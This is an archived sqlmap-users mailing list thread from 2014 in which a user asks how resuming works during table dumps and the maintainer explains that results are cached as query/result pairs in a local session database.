On Sun, Aug 17, 2014 at 8:48 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi.
>
> Entries are resumed one by one as they are stored as pairs (query, result)
> in local session database, where query represents respective SQL query used
> to retrieve that same entry. If entry doesn't appear to be a product of a
> valid "retrieval" it is not stored (this largely depends on type of SQLI).
>
> You have to be more specific about your case (SQLI technique, content of
> "updated" entries, etc.) so I could be able to answer more precisely.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Sun, Aug 17, 2014 at 11:16 AM, Michael Bachmann <mba...@gm...>
> wrote:
>
>> Hi guys
>>
>> I couldn't find any details regarding my topic.
>>
>> Could you please explain how the logic for resuming/retrieving while
>> dumping works?
>>
>> Cause i dumped a table, waited for it to be completed and then started a
>> second dump. Most of the entries got resumed and i was wondering, why there
>> were new entries in the second dump i didn't have and also "updated"
>> entries i already had.
>>
>> Best regards
>> Michael
>>
>>
>> ------------------------------------------------------------------------------
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] Resume logic for table content dump

From: Miroslav S. <mir...@gm...> - 2014-08-17 13:48:17

Hi.

Entries are resumed one by one as they are stored as pairs (query, result)
in local session database, where query represents respective SQL query used
to retrieve that same entry. If entry doesn't appear to be a product of a
valid "retrieval" it is not stored (this largely depends on type of SQLI).

You have to be more specific about your case (SQLI technique, content of
"updated" entries, etc.) so I could be able to answer more precisely.

Kind regards,
Miroslav Stampar

On Sun, Aug 17, 2014 at 11:16 AM, Michael Bachmann <mba...@gm...>
wrote:

> Hi guys
>
> I couldn't find any details regarding my topic.
>
> Could you please explain how the logic for resuming/retrieving while
> dumping works?
>
> Cause i dumped a table, waited for it to be completed and then started a
> second dump. Most of the entries got resumed and i was wondering, why there
> were new entries in the second dump i didn't have and also "updated"
> entries i already had.
>
> Best regards
> Michael
>
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Resume logic for table content dump

From: Michael B. <mba...@gm...> - 2014-08-17 09:16:41

Hi guys

I couldn't find any details regarding my topic.

Could you please explain how the logic for resuming/retrieving while
dumping works?

Cause i dumped a table, waited for it to be completed and then started a
second dump. Most of the entries got resumed and i was wondering, why there
were new entries in the second dump i didn't have and also "updated"
entries i already had.

Best regards
Michael

48 messages has been excluded from this view by a project administrator.

Flat | Threaded

<< < 1 .. 17 18 19 20 21 .. 145 > >> (Page 19 of 145)